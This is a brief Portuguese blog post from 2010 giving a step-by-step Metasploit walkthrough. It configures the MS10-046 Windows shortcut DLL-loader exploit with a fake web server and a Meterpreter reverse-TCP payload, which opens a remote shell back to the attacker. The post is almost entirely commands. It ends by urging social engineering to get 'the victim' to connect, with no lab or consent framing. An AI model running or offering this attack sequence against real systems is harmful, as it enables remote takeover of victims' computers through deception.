terça-feira, 30 de novembro de 2010

todos w$

# ./msfconsole

O primeiro comando seleciona o exploit que será usado:

> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Caso queiramos mais informações sobre o exploit e sua respectiva falha, podemos digitar o seguinte comando:

> info

Esse comando exibirá, além da informações sobre a falha, as opções que precisamos configurar para o correto funcionamento do exploit. As opções obrigatórias são: SRVHOST, SRVPORT

Vamos configurá-las:

> set SRVHOST 192.168.0.83

Esse último comando, permitirá configurarmos o IP no qual o servidor web falso será montado para que a vítima acesso-o. No comando abaixo, vamos configurar a porta na qual o servidor ficará escutando, à espera de uma conexão:

> set SRVPORT 80

Havendo configurado a parte básica do exploit, precisamos configurar o que ele fará após explorar a falha no navegador da vítima, isso é, o payload:

> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.0.83
> set LPORT 4444

Tudo configurado, funcionando bem, sem nenhum erro, simplesmente lançamos o exploit e aguardamos a vítima conectar em nosso servidor falso:

> exploit

Para conseguirmos que a vítima conecte, nada como um bom e velho ataque de engenharia social :-)

Nenhum comentário:

Postar um comentário